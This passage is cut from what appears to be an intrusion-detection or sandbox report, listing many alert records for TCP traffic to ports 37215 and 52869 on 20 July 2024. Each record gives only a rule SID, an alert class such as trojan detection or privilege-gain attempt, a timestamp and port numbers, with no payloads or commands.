                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2829579
                      Source Port:50016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.091054
                      SID:2025132
                      Source Port:35426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.173503
                      SID:2831300
                      Source Port:42864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.167348
                      SID:2027339
                      Source Port:57384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440249
                      SID:2831300
                      Source Port:57758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2831300
                      Source Port:57542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.472705
                      SID:2027339
                      Source Port:38590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.319180
                      SID:2025132
                      Source Port:41680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:42072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.861533
                      SID:2025132
                      Source Port:49538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.787162
                      SID:2027339
                      Source Port:49926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.764775
                      SID:2025132
                      Source Port:51260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.281029
                      SID:2025132
                      Source Port:44108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.526129
                      SID:2027339
                      Source Port:56604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.147601
                      SID:2027339
                      Source Port:50840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.156324
                      SID:2025132
                      Source Port:58726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.371087
                      SID:2025132
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.427946
                      SID:2025132
                      Source Port:34410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.919151
                      SID:2027339
                      Source Port:39182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.442399
                      SID:2027339
                      Source Port:46192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.978388
                      SID:2025132
                      Source Port:47834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2835222
                      Source Port:50158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.107735
                      SID:2829579
                      Source Port:48316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.549013
                      SID:2027339
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.372966
                      SID:2025132
                      Source Port:37584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2027339
                      Source Port:36416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.233115
                      SID:2831300
                      Source Port:55078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.139544
                      SID:2831300
                      Source Port:49740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:34402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:44554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.480553
                      SID:2831300
                      Source Port:47430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.756534
                      SID:2027339
                      Source Port:45682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2027339
                      Source Port:60908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:53450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2835222
                      Source Port:51872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2829579
                      Source Port:36302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.296188
                      SID:2027339
                      Source Port:32892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2831300
                      Source Port:36686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2831300
                      Source Port:50736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.171719
                      SID:2027339
                      Source Port:34382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:34096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2027339
                      Source Port:44298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2027339
                      Source Port:52988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:53.677192
                      SID:2831300
                      Source Port:59786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2027339
                      Source Port:36278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.331312
                      SID:2831300
                      Source Port:38018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.499893
                      SID:2829579
                      Source Port:41360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.234952
                      SID:2025132
                      Source Port:60994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2831300
                      Source Port:55320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.470290
                      SID:2831300
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2835222
                      Source Port:50152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2835222
                      Source Port:40596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.001861
                      SID:2025132
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2027339
                      Source Port:39678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2027339
                      Source Port:32962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.112950
                      SID:2025132
                      Source Port:52180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.709144
                      SID:2025132
                      Source Port:50946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.553922
                      SID:2025132
                      Source Port:41886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:08:31.687974
                      SID:2025132
                      Source Port:37116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.972369
                      SID:2831300
                      Source Port:59252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2027339
                      Source Port:43796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.151260
                      SID:2027339
                      Source Port:58744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:49468
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.121210
                      SID:2829579
                      Source Port:57422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.612988
                      SID:2025132
                      Source Port:54776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.953643
                      SID:2835222
                      Source Port:37320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2831300
                      Source Port:59280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:34586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.171136
                      SID:2027339
                      Source Port:57692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.125247
                      SID:2025132
                      Source Port:59178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2027339
                      Source Port:59730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.345907
                      SID:2027339
                      Source Port:49020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.143470
                      SID:2027339
                      Source Port:42336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2831300
                      Source Port:45848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.929510
                      SID:2027339
                      Source Port:50564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.085828
                      SID:2025132
                      Source Port:60528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.898489
                      SID:2027339
                      Source Port:58758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.825307
                      SID:2027339
                      Source Port:46694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2027339
                      Source Port:39660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515904
                      SID:2835222
                      Source Port:52610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.433850
                      SID:2027339
                      Source Port:58772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.453690
                      SID:2831300
                      Source Port:51928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:46210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2831300
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.324702
                      SID:2831300
                      Source Port:51322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.161519
                      SID:2027339
                      Source Port:33072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.233806
                      SID:2835222
                      Source Port:37478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.683294
                      SID:2025132
                      Source Port:45484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.835672
                      SID:2025132
                      Source Port:38880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.640556
                      SID:2027339
                      Source Port:55198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.442605
                      SID:2027339
                      Source Port:38332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2835222
                      Source Port:35016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2027339
                      Source Port:58938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404275
                      SID:2025132
                      Source Port:54610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:47436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.994838
                      SID:2025132
                      Source Port:56248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2835222
                      Source Port:35828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.714968
                      SID:2027339
                      Source Port:56142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.822070
                      SID:2831300
                      Source Port:57790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.318185
                      SID:2027339
                      Source Port:55088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2835222
                      Source Port:56302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.076249
                      SID:2027339
                      Source Port:59556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.692606
                      SID:2831300
                      Source Port:56016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.436745
                      SID:2027339
                      Source Port:41462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.073224
                      SID:2025132
                      Source Port:49240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:15.616106
                      SID:2831300
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2027339
                      Source Port:50228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.290845
                      SID:2025132
                      Source Port:37912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.237933
                      SID:2027339
                      Source Port:40268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2027339
                      Source Port:48630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.671322
                      SID:2025132
                      Source Port:50430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2027339
                      Source Port:55252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.482880
                      SID:2025132
                      Source Port:33660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.657431
                      SID:2027339
                      Source Port:54662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2027339
                      Source Port:54692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.557710
                      SID:2027339
                      Source Port:56342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.216480
                      SID:2025132
                      Source Port:44670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.662240
                      SID:2025132
                      Source Port:36808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.822070
                      SID:2027339
                      Source Port:41324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.255397
                      SID:2025132
                      Source Port:45172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.357380
                      SID:2025132
                      Source Port:42522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2831300
                      Source Port:50232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.157384
                      SID:2027339
                      Source Port:50876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2027339
                      Source Port:40206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627950
                      SID:2829579
                      Source Port:54356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.319581
                      SID:2025132
                      Source Port:54240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.426944
                      SID:2027339
                      Source Port:59132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2829579
                      Source Port:45434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.673677
                      SID:2027339
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2027339
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.406154
                      SID:2027339
                      Source Port:43090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.934740
                      SID:2027339
                      Source Port:52208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:43574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2831300
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.438296
                      SID:2027339
                      Source Port:48352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.844842
                      SID:2027339
                      Source Port:40916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.244446
                      SID:2025132
                      Source Port:59116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2831300
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.283632
                      SID:2027339
                      Source Port:39728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2027339
                      Source Port:37724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2835222
                      Source Port:54852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.438620
                      SID:2025132
                      Source Port:36672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:59844
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164569
                      SID:2025132
                      Source Port:56726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.205784
                      SID:2831300
                      Source Port:57124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2829579
                      Source Port:60416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.551915
                      SID:2831300
                      Source Port:52730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:32.540944
                      SID:2027339
                      Source Port:43338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.112749
                      SID:2027339
                      Source Port:38144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164884
                      SID:2027339
                      Source Port:44186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.639265
                      SID:2831300
                      Source Port:54412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.709518
                      SID:2025132
                      Source Port:49142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.582686
                      SID:2025132
                      Source Port:44164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.068811
                      SID:2027339
                      Source Port:44140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.756534
                      SID:2027339
                      Source Port:56644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.592016
                      SID:2027339
                      Source Port:34560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2025132
                      Source Port:40122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2027339
                      Source Port:49442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.478142
                      SID:2027339
                      Source Port:51922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.555463
                      SID:2027339
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.203581
                      SID:2025132
                      Source Port:33044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.483839
                      SID:2025132
                      Source Port:41794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2829579
                      Source Port:39984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.936056
                      SID:2831300
                      Source Port:34278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2831300
                      Source Port:50344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.233976
                      SID:2025132
                      Source Port:37632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.330840
                      SID:2027339
                      Source Port:60854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.770015
                      SID:2027339
                      Source Port:53082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.747598
                      SID:2027339
                      Source Port:50210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.018219
                      SID:2027339
                      Source Port:53574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2027339
                      Source Port:59852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.457796
                      SID:2025132
                      Source Port:56268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.316014
                      SID:2025132
                      Source Port:33070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.681117
                      SID:2025132
                      Source Port:59468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.266985
                      SID:2027339
                      Source Port:34422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2829579
                      Source Port:43368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.389614
                      SID:2027339
                      Source Port:50182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.526701
                      SID:2027339
                      Source Port:42610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:42106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345103
                      SID:2025132
                      Source Port:45096
                      Destination Port:52869
